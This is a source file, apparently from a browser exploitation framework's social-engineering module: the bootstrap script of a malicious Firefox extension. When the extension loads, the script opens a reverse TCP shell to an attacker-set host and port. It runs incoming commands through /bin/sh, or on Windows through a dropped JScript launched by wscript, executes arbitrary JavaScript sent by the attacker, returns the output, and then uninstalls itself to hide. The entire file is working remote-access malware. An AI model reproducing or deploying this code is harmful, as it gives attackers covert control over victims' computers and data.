Path: blob/master/modules/social_engineering/firefox_extension_reverse_shell/extension/bootstrap.js
1873 views
1function startup(data, reason) {2var file = Components.classes["@mozilla.org/file/directory_service;1"].3getService(Components.interfaces.nsIProperties).4get("ProfD", Components.interfaces.nsIFile);5file.append("extensions");6xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";7file.append(xpi_guid);89// # ./msfpayload firefox/shell_reverse_tcp10(function(){11Components.utils.import("resource://gre/modules/NetUtil.jsm");12var host = '__reverse_shell_host_placeholder__';13var port = __reverse_shell_port_placeholder__;1415var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]16.getService(Components.interfaces.nsISocketTransportService);17var socket = socketTransport.createTransport(null, 0, host, port, null);18var outStream = socket.openOutputStream(0, 0, 0);19var inStream = socket.openInputStream(0, 0, 0);2021var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]22.createInstance(Components.interfaces.nsIInputStreamPump);23pump.init(inStream, -1, -1, 0, 0, true);2425var listener = {26onStartRequest: function(request, context) {},27onStopRequest: function(request, context) {},28onDataAvailable: function(request, context, stream, offset, count) {29var data = NetUtil.readInputStreamToString(stream, count).trim();30runCmd(data, function(err, output) {31if (!err) outStream.write(output, output.length);32});33}34};3536var readFile = function(path) {37try {38var file = Components.classes["@mozilla.org/file/local;1"]39.createInstance(Components.interfaces.nsILocalFile);40file.initWithPath(path);4142var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]43.createInstance(Components.interfaces.nsIFileInputStream);44fileStream.init(file, 1, 0, false);4546var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]47.createInstance(Components.interfaces.nsIBinaryInputStream);48binaryStream.setInputStream(fileStream);49var array = binaryStream.readByteArray(fileStream.available());5051binaryStream.close();52fileStream.close();53file.remove(true);5455return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");56} catch (e) { return ""; }57};585960var setTimeout = function(cb, delay) {61var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);62timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);63return timer;64};656667var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]68.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;69var windows = (ua.indexOf("Windows")>-1);70var svcs = Components.utils.import("resource://gre/modules/Services.jsm");71var jscript = ({"src":"\n var b64 = WScript.arguments(0);\n var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n var el = dom.createElement(\"root\");\n el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n var stream = new ActiveXObject(\"ADODB.Stream\");\n stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n var cmd = stream.ReadText();\n (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n "}).src;72var runCmd = function(cmd, cb) {73cb = cb || (function(){});7475if (cmd.trim().length == 0) {76setTimeout(function(){ cb("Command is empty string ('')."); });77return;78}7980var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim());81if (js) {82var tag = "[!JAVASCRIPT]";83var sync = true; // avoid zalgo's reach84var sent = false;85var retVal = null;8687try {88retVal = Function('send', js[1])(function(r){89if (sent) return;90sent = true91if (r) {92if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });93else cb(false, r+tag+"\n");94}95});96} catch (e) { retVal = e.message; }9798sync = false;99100if (retVal && !sent) {101sent = true;102setTimeout(function(){ cb(false, retVal+tag+"\n"); });103}104105return;106}107108var shEsc = "\\$&";109var shPath = "/bin/sh -c"110111if (windows) {112shPath = "cmd /c";113shEsc = "\^$&";114var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]115.getService(Components.interfaces.nsIProperties)116.get("TmpD", Components.interfaces.nsIFile);117jscriptFile.append('7kZuA4kPoh2HzVagS.js');118var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]119.createInstance(Components.interfaces.nsIFileOutputStream);120stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0);121stream.write(jscript, jscript.length);122if (stream instanceof Components.interfaces.nsISafeOutputStream) {123stream.finish();124} else {125stream.close();126}127}128129var stdoutFile = "7tDzOIHbP3vzglqB";130131var stdout = Components.classes["@mozilla.org/file/directory_service;1"]132.getService(Components.interfaces.nsIProperties)133.get("TmpD", Components.interfaces.nsIFile);134stdout.append(stdoutFile);135136if (windows) {137var shell = shPath+" "+cmd;138shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";139var b64 = svcs.btoa(shell);140} else {141var shell = shPath+" "+cmd.replace(/\W/g, shEsc);142shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";143}144var process = Components.classes["@mozilla.org/process/util;1"]145.createInstance(Components.interfaces.nsIProcess);146var sh = Components.classes["@mozilla.org/file/local;1"]147.createInstance(Components.interfaces.nsILocalFile);148149if (windows) {150sh.initWithPath("C:\\Windows\\System32\\wscript.exe");151process.init(sh);152var args = [jscriptFile.path, b64];153process.run(true, args, args.length);154jscriptFile.remove(true);155setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});156} else {157sh.initWithPath("/bin/sh");158process.init(sh);159var args = ["-c", shell];160process.run(true, args, args.length);161setTimeout(function(){cb(false, readFile(stdout.path));});162}163};164165166pump.asyncRead(listener, null);167})();168169170171try { // Fx < 4.0172Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);173} catch (e) {}174try { // Fx 4.0 and later175Components.utils.import("resource://gre/modules/AddonManager.jsm");176AddonManager.getAddonByID(xpi_guid, function(addon) {177addon.uninstall();178});179} catch (e) {}180}181182183